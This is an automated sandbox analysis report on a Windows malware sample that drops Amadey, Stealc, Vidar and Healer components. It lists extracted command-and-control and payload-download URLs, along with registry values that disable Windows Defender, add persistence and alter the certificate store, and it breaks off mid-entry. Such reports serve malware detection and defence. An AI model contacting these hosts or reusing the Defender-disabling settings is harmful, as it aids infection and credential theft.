Analysis
-
max time kernel
149s -
max time network
148s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
24/03/2025, 09:01
Static task
static1
Behavioral task
behavioral1
Sample
86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe
Resource
win10v2004-20250314-en
General
-
Target
86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe
-
Size
938KB
-
MD5
278fa6cdc2189c33b3cf59614d6d9e7f
-
SHA1
f382716bf5dc31ee6cdac0a1f9890a5164d0c18e
-
SHA256
86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a
-
SHA512
76cdd7a6b9e45ae8413f60e0369d045bfd1bfc3e879e0fac54c1303d312813380dc8907aeaf5e6525b47aa9c3768bac99c58fd1f7a2a38f5f193b5d55ebbf9c6
-
SSDEEP
24576:eqDEvCTbMWu7rQYlBQcBiT6rprG8a0uu:eTvC/MTQYxsWR7a0u
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detect Vidar Stealer 1 IoCs
resource yara_rule behavioral1/memory/3144-688-0x0000000000400000-0x0000000000869000-memory.dmp family_vidar_v7 -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/1624-429-0x0000000000300000-0x0000000000742000-memory.dmp healer behavioral1/memory/1624-427-0x0000000000300000-0x0000000000742000-memory.dmp healer behavioral1/memory/1624-686-0x0000000000300000-0x0000000000742000-memory.dmp healer -
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" d882bd1dca.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" d882bd1dca.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" d882bd1dca.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" d882bd1dca.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection d882bd1dca.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" d882bd1dca.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" d882bd1dca.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" d882bd1dca.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications d882bd1dca.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" d882bd1dca.exe -
Stealc family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 3644 created 1200 3644 Organizations.com 21 -
Vidar family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d882bd1dca.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 978c3aa7bf.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempYEVPQVNGORICJML5CO5PJXDWHCZW72LC.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempXQEYYAECNHFBOUUM2CFKXY39DBWQP7SR.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ fbee3d7922.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 25398cf7b3.exe -
Blocklisted process makes network request 3 IoCs
flow pid Process 4 2848 powershell.exe 9 1428 powershell.exe 10 2948 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell and hide display window.
pid Process 2848 powershell.exe 1428 powershell.exe 2948 powershell.exe 1988 powershell.exe 2472 powershell.exe 2116 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 15 IoCs
flow pid Process 11 320 rapes.exe 166 320 rapes.exe 167 320 rapes.exe 7 320 rapes.exe 7 320 rapes.exe 8 320 rapes.exe 12 320 rapes.exe 12 320 rapes.exe 19 320 rapes.exe 19 320 rapes.exe 19 320 rapes.exe 159 320 rapes.exe 9 1428 powershell.exe 4 2848 powershell.exe 10 2948 powershell.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 1588 icacls.exe 1268 takeown.exe -
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 16 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempXQEYYAECNHFBOUUM2CFKXY39DBWQP7SR.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 25398cf7b3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempYEVPQVNGORICJML5CO5PJXDWHCZW72LC.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion fbee3d7922.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 978c3aa7bf.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d882bd1dca.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempXQEYYAECNHFBOUUM2CFKXY39DBWQP7SR.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion fbee3d7922.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 978c3aa7bf.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 25398cf7b3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d882bd1dca.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempYEVPQVNGORICJML5CO5PJXDWHCZW72LC.EXE -
Executes dropped EXE 27 IoCs
pid Process 2712 TempYEVPQVNGORICJML5CO5PJXDWHCZW72LC.EXE 320 rapes.exe 540 cUpXaxB.exe 2664 apple.exe 2244 11.exe 1868 11.exe 2712 Jq0hGDZ.exe 2440 32a030fbd9.exe 2272 TempXQEYYAECNHFBOUUM2CFKXY39DBWQP7SR.EXE 2828 483d2fa8a0d53818306efeb32d3.exe 2088 QL4t9UZ.exe 1596 laf6w_001.exe 2276 ed25bd08e9.exe 1108 fbee3d7922.exe 2364 25398cf7b3.exe 2772 503d76e836.exe 1624 d882bd1dca.exe 3144 978c3aa7bf.exe 3408 311359747f.exe 3544 Jq0hGDZ.exe 3628 cUpXaxB.exe 3748 zx4PJh6.exe 3644 Organizations.com 3952 tK0oYx3.exe 3112 y0u3d_003.exe 3076 cUpXaxB.exe 1988 OkH8IPF.exe -
Identifies Wine through registry keys 2 TTPs 8 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine fbee3d7922.exe Key opened \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine 25398cf7b3.exe Key opened \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine d882bd1dca.exe Key opened \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine 978c3aa7bf.exe Key opened \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine TempYEVPQVNGORICJML5CO5PJXDWHCZW72LC.EXE Key opened \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine TempXQEYYAECNHFBOUUM2CFKXY39DBWQP7SR.EXE Key opened \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe -
Loads dropped DLL 59 IoCs
pid Process 2848 powershell.exe 2712 TempYEVPQVNGORICJML5CO5PJXDWHCZW72LC.EXE 320 rapes.exe 320 rapes.exe 320 rapes.exe 2664 apple.exe 2664 apple.exe 2664 apple.exe 2664 apple.exe 320 rapes.exe 320 rapes.exe 320 rapes.exe 1428 powershell.exe 2948 powershell.exe 320 rapes.exe 320 rapes.exe 320 rapes.exe 320 rapes.exe 320 rapes.exe 648 WerFault.exe 648 WerFault.exe 648 WerFault.exe 648 WerFault.exe 320 rapes.exe 320 rapes.exe 320 rapes.exe 320 rapes.exe 320 rapes.exe 320 rapes.exe 320 rapes.exe 320 rapes.exe 320 rapes.exe 320 rapes.exe 3508 WerFault.exe 3508 WerFault.exe 3508 WerFault.exe 3508 WerFault.exe 320 rapes.exe 320 rapes.exe 320 rapes.exe 320 rapes.exe 320 rapes.exe 3748 zx4PJh6.exe 3832 CMD.exe 320 rapes.exe 320 rapes.exe 3984 WerFault.exe 3984 WerFault.exe 3984 WerFault.exe 3984 WerFault.exe 320 rapes.exe 3644 Organizations.com 3644 Organizations.com 320 rapes.exe 320 rapes.exe 3280 WerFault.exe 3280 WerFault.exe 3280 WerFault.exe 3280 WerFault.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 1268 takeown.exe 1588 icacls.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" d882bd1dca.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features d882bd1dca.exe -
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\32a030fbd9.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10318740101\\32a030fbd9.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10318750121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\fbee3d7922.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10319000101\\fbee3d7922.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\25398cf7b3.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10319010101\\25398cf7b3.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\503d76e836.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10319020101\\503d76e836.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\d882bd1dca.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10319030101\\d882bd1dca.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x00030000000001d7-109.dat autoit_exe behavioral1/files/0x00050000000195f9-282.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 1240 tasklist.exe 3300 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
pid Process 2712 TempYEVPQVNGORICJML5CO5PJXDWHCZW72LC.EXE 320 rapes.exe 2272 TempXQEYYAECNHFBOUUM2CFKXY39DBWQP7SR.EXE 2828 483d2fa8a0d53818306efeb32d3.exe 1108 fbee3d7922.exe 2364 25398cf7b3.exe 1624 d882bd1dca.exe 3144 978c3aa7bf.exe -
Drops file in Program Files directory 46 IoCs
description ioc Process File opened for modification C:\Program Files\Windows Defender\MpCommu.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MpEvMsg.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\en-US\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpOAV.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MpRTP.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\en-US\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\en-US\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MsMpCom.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\MpOAV.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MsMpRes.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpAsDesc.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\MsMpLics.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MpCmdRun.exe cmd.exe File opened for modification C:\Program Files\Windows Defender\MpSvc.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\en-US\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MSASCui.exe cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\en-US\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpClient.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MsMpLics.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\MpAsDesc.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\MpClient.dll cmd.exe -
Drops file in Windows directory 8 IoCs
description ioc Process File opened for modification C:\Windows\OfficeForbes zx4PJh6.exe File opened for modification C:\Windows\VancouverPulse zx4PJh6.exe File opened for modification C:\Windows\GuaranteesFear zx4PJh6.exe File opened for modification C:\Windows\InvestingTr zx4PJh6.exe File opened for modification C:\Windows\CylinderPair zx4PJh6.exe File created C:\Windows\Tasks\rapes.job TempYEVPQVNGORICJML5CO5PJXDWHCZW72LC.EXE File opened for modification C:\Windows\NecessityInfections zx4PJh6.exe File opened for modification C:\Windows\SheDrum zx4PJh6.exe -
Launches sc.exe 38 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1724 sc.exe 1604 sc.exe 2568 sc.exe 2812 sc.exe 2708 sc.exe 1624 sc.exe 1452 sc.exe 2072 sc.exe 896 sc.exe 3060 sc.exe 1884 sc.exe 2364 sc.exe 1552 sc.exe 2688 sc.exe 2388 sc.exe 2116 sc.exe 1716 sc.exe 324 sc.exe 3064 sc.exe 2468 sc.exe 2828 sc.exe 972 sc.exe 912 sc.exe 2160 sc.exe 1696 sc.exe 2628 sc.exe 2020 sc.exe 1952 sc.exe 1756 sc.exe 1600 sc.exe 2592 sc.exe 1660 sc.exe 2936 sc.exe 2268 sc.exe 1488 sc.exe 2964 sc.exe 2896 sc.exe 2984 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 54 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 11.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zx4PJh6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language y0u3d_003.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 11.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 32a030fbd9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempYEVPQVNGORICJML5CO5PJXDWHCZW72LC.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language laf6w_001.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cUpXaxB.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apple.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 503d76e836.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Organizations.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 503d76e836.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d882bd1dca.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 25398cf7b3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 503d76e836.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 978c3aa7bf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fbee3d7922.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CMD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 1644 timeout.exe 1644 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 3032 taskkill.exe 2804 taskkill.exe 2416 taskkill.exe 728 taskkill.exe 3068 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000_Classes\Local Settings firefox.exe -
Modifies system certificate store 2 TTPs 3 IoCs
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 978c3aa7bf.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 978c3aa7bf.exe Set value (data) 